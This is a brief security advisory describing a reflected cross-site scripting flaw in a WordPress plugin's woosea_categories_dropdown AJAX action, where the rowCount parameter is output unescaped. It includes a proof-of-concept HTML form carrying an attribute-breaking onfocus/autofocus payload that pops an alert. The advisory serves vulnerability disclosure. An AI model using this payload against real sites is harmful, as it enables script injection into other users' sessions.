The plugin does not escape the rowCount parameter before outputting it back in an attribute via the woosea_categories_dropdown AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=woosea_categories_dropdown" method="POST">
<input type="text" name="rowCount" value='" onfocus=alert(`XSS`) autofocus x'>
<input type="submit" value="Send">
</form>
</html>